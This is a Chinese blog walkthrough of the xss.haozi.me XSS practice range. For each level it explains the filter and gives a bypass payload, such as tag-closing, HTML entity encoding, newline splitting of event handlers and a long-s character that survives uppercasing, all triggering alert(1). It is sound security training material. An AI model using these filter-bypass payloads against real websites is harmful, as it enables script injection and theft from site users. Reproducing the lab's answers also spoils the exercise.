xss.haozi靶场通关

最新推荐文章于 2024-07-28 08:30:00 发布
最新推荐文章于 2024-07-28 08:30:00 发布
阅读量388 收藏
点赞数
分类专栏: 网络安全 文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_60719780/article/details/128571920
版权

做完xss-labs靶场后,再继续做这个靶场,感觉这个不是很难,毕竟在第一个靶场也获取了一些经验,但是这个靶场偏向技巧,所以还是以了解为主。

0x00:

分析:对我们的代码未作出限制,因此这里可以使用多种方法来进行绕过

<script>alert(1)</script>

 0x01:

分析:这一关有了限制条件,这里给出的限制条件是<textarea>,而<textarea>标签下所有js代码不能执行,所以需要先闭合该标签。只要逃出<textarea>标签即可

</textarea><img src="1" onerror=alert(1)>

测试结果:

 0x02:

分析:我先使用<script>alert(1)</script> payload进行测试,发现写进去未执行,原因是这里给出的限制条件是input标签,我们可以尝试闭合input标签,即添加"和>。逃出input标签后就行,可以使用的payload比较多;

"><script>alert(1)</script>

 测试结果:

 0x03:

分析:限制条件是replace方法和过滤了()。我们可以通过实体编码括号和反引号``来绕过。

 测试:

 0x04:

分析:再上一关的基础上过滤了反引号,那几很简单了,采用编码的形式来进行绕过:

测试:

<img src="1" onerror="alert&#40;1&#41;">

 0x05:

分析:刚开始我们输入简单的payload进行测试,发现我们都是以注释的形式展示,那我们的js标签肯定生效不了了,只要逃出注释符,那我们的payload就会执行。

 测试:

--!><script>alert(1)</script><!-

 0x06:

分析:这里给出的限制条件是对auto和on开头只要加上等号就会变为下划线,加上大于号大于号也会变为下划线,过滤了autoforce和onerror事件,这两个事件我们就用不了了,我们可以使用一个换行的技巧前提要加一个type属性值image和src映射路径属性,然后再让等于号和属性分开。

测试:

type="image" src="1" onerror
=alert(1)

 0x07:

分析:限制条件是对<></>标签进行了限制,不能闭合标签,那么这里我们可以使用<img标签来通过。

<img src="1" onerror="alert(1)"

测试:

0x08

分析:通过下面代码,这里给出的限制条件是对</style>进行了过滤,如果输入就会显示后面的编码内容,并且style标签中只能出现文本或者符号,js代码无法生效,我们尝试换行技巧

测试:

</style
><script>alert(1)</script>

 0x09:

分析:

通过输入简单的payload,我发现返回值为Invalid URL,于是我查看了代码,原来是需要加入url地址啊,那就很简单了;

 测试:

http://www.segmentfault.com"></script><script>alert(1)</script>

 0x0B:

分析:通过简单的测试,发现我们的代码都转为了大写,然后查看过滤函数,和我想的一样,toUpperCase函数;直接编码就行

测试:

<svg/onload=&#97;&#108;&#101;&#114;&#116;(1)>

 

0x0C:

分析:简单测试下,发现关于script标签的都会过滤,那很简单了,要不使用实体编码要不双写,而且继续对代码转为大写,上一关的payload完全符合啊,很巧,哈哈哈哈

测试:

<svg/onload=&#97;&#108;&#101;&#114;&#116;(1)>

0x0D

分析:限制条件是通过正则表达式过滤了<、/、"、'这四种符号,并且指定了我们的input在//注释语句中,首先逃出注释语句

测试:

-->
alert(1)
-->

0x0E

分析:

这一关我想了好久还是没想到,最后查看了别人写的分析才明白了。

这里给出的限制条件是使用正则表达式过滤了所有字母,并且将字母小写转为了大写,如果输入<script>就会转为<_CRIPT>,所以这里只能使用一个特殊的符号 ſ ,它可以在转换为s而不被过滤,并且由于js中区分大小写,所以还需要将里面的js事件代码进行十进制的实体编码。

测试:

<ſvg onload=&#97;&#108;&#101;&#114;&#116;(1)>

 

0x0F

分析:

测试:

aaa'),alert(1)//

0x10

分析:这一关没啥限制,直接在<script>标签输入alert就行

测试:

alert(1)

 

0x11

分析:限制条件是对`,“,<,>,,\n等进行了过滤,我们输入双引号它会显示\”,其实这里并没有将双引号成功过滤,所以还是可以去使用。

测试:

");alert("1

0x12

分析:

测试:

</script><img src="1" onerror=alert(1)>

 多练习,掌握经验。

奋斗的小智
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS线上靶场---haozi
qq_52016943的博客
07-29 1260
XSS 在线靶场
xss.haozi靶场练习记录
Dexret的博客
11-29 1174
题目链接:https://xss.haozi.me 该靶场是部署在github上的一个项目,通关条件为弹出两个小人击掌的图片即为通关(单纯弹出弹窗是不属于通关的) 0x00 第一关没啥要点,xss入门基础 payload <img src="x" onerror="alert(1)"> 0x01 从server code和下面输出的html可以看出输入的内容被插入到<textarea></textarea>中,在输入的payload前面加上<te
XSS靶场haozi.me)
weixin_52240463的博客
08-15 679
一边看题解一边打了一个下午终于通关 小rookie一个比较菜 很多不会的地方查了很多资料 可能有部分思路和别的地方又雷同 各位姥爷看看就好 目录 0x00 送分题啥过滤没有​ 0x01​textarea 字面意思是文本域 类似text类型 不能触发xss 需要闭合 0x02 0x03 0x04​ 0x05 0x06 0x07 0x08 0x09 0x0a 0x0b 0x0c 0x0d 0x0e 0x0f 0x10 送分题啥过滤没有 0x01tex...
XSS-haozi
个人博客
08-10 363
https://xss.haozi.me/ XSS学习 github项目地址:haozi/xss-demo: ????????‍♂️ xss 攻防靶场,issues 有答案 (github.com) 0x00 server code function render (input) { return '<div>' + input + '</div>' } payload <script>alert(1)</script> 未做处理 0x01 ser
XXS靶场haozi
m0_61579490的博客
08-02 509
XXS靶场之线上靶场haozi
xss.js.zip
07-29
"xss.js.zip"是一个专注于防止XSS攻击的JavaScript模块,它通过严格的输入过滤和白名单策略来确保用户提交的内容不会引入潜在的恶意代码。 首先,"xss.js"的核心功能在于提供了一套完整的输入过滤机制。这个模块会...
xss-labs靶场通关
10-13
xss-labs靶场通关 本篇文章将对xss-labs靶场的六关源码进行详细的分析和总结,并对每一关的xss攻击payload进行解释。 第一关 xss-labs靶场的第一关源码没有做任何过滤,直接上xss payload:<script>alert("XSS")...
XSS.rar_XSS
09-22
XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的网络安全问题,尤其是在Web前端开发中尤为突出。XSS攻击允许攻击者在用户浏览器上执行恶意脚本,从而窃取用户数据、操纵用户界面或者执行其他有害操作。以下...
SpringBoot整合XSS.zip
04-30
1. **XSS攻击简介**:XSS(Cross Site Scripting)是一种常见的网络攻击方式,攻击者通过在网页上注入恶意脚本,使得用户在不知情的情况下执行这些脚本,从而获取敏感信息或执行恶意操作。XSS攻击通常分为反射型、...
xss.js:简单的基于白名单的 html sanitizer
06-21
4. **自定义配置**:为了满足不同场景的需求,`xss.js`可能提供自定义白名单配置的选项,允许开发者根据自己的应用需求添加或移除元素和属性。 5. **兼容性**:作为一个JavaScript库,`xss.js`应该考虑各种浏览器的...
XSS靶场(二)xss.haozi
C_LCH_2000的博客
07-29 294
xss.haozi所有关卡解法
xss.haozi.me靶场详解
m0_46467017的博客
07-28 2146
由于xss.haozi.me是一个在线靶场,服务部署在Github,若网速不好,则需要科学上网。由于本靶场是一个白盒测试的靶场,我们可以看到代码的源码,所以可以直接根据源码的限制的条件来思考如何绕过。...
xss.haozi.me通关教程
自强不息
02-01 1221
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
xss.haozi.me靶机
newlife1441的博客
07-28 340
对auto和on开头只要加上等于号就会变为下划线,加上大于号大于号也会变为下划线,这里其实就是过滤了autoforce和onerror事件,我们可以使用一个换行的技巧前提要加一个type属性值image和src映射路径属性,然后再让等于号和属性分开。虽然这里对我们可以使用的单引号、双引号等字符进行了转义但是我们可以发现,如果我们输入双引号它会显示/",并没有将双引号成功过滤,所以我们还是可以去使用。alert(1)时需要换行。.........
XSS漏洞:xss.haozi.me靶场通关
qq_68163788的博客
01-18 2083
xss.haozi.me是一个专门用于测试和学习跨站脚本(XSS)漏洞的靶场XSS漏洞是一种常见的Web安全漏洞,攻击者通过在网页中注入恶意脚本,可以获取用户的敏感信息,如Cookie、会话令牌等。 通关xss.haozi.me靶场意味着成功利用了该靶场中的XSS漏洞,并完成了相应的任务。在这个过程中,你需要利用各种XSS漏洞,包括反射型XSS、存储型XSS等,来实现跨站脚本攻击,并获取相应的flag或者完成指定的任务。 通过通关xss.haozi.me靶场,你可以提升自己的Web安全技能,了解XSS
XSS漏洞:xss.haozi.me靶场1-12 | A-F
最新发布
weixin_68416970的博客
07-28 2709
XSS漏洞靶场xss.haozi.me靶场的1-12关、A-F关通关教程
xss.haozi.me解题记录
qq_43623492的博客
03-31 950
0X00 payload:<script>alert(1)</script> 0x01 这一关可以发现我们输入的东西会出现在textarea标签内,所以我们尝试闭合textarea标签 payload:</textarea><script>alert(1)</script><!-- 0x02 输入的内容会出现input标签的va...
xss.haozi练习通关详解
爱国小白帽
11-05 2522
题目连接:https://xss.haozi.me 0x00 原理解读: 这个游戏是要弹图片才算通关的,光弹窗不行,所以第一关就用最简单的img标签过 payload: <img src="任意图片名" onerror="alert(1)"> 0x01 原理解读: 从server code中可以看到输入的内容被插入到了<textarea>标签中,所以只要闭合这个标签就行了 payload: </textarea><img src="任意图片名" onerror=
xss-labs靶场通关详解
08-26
对不起,我无法提供有关特定靶场 "xss-labs" 的详细通关解释,因为我无法直接访问互联网或搜索特定的信息。然而,XSS(跨站脚本攻击)是一种常见的网络安全漏洞,它允许攻击者将恶意的脚本注入到网页中,从而获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值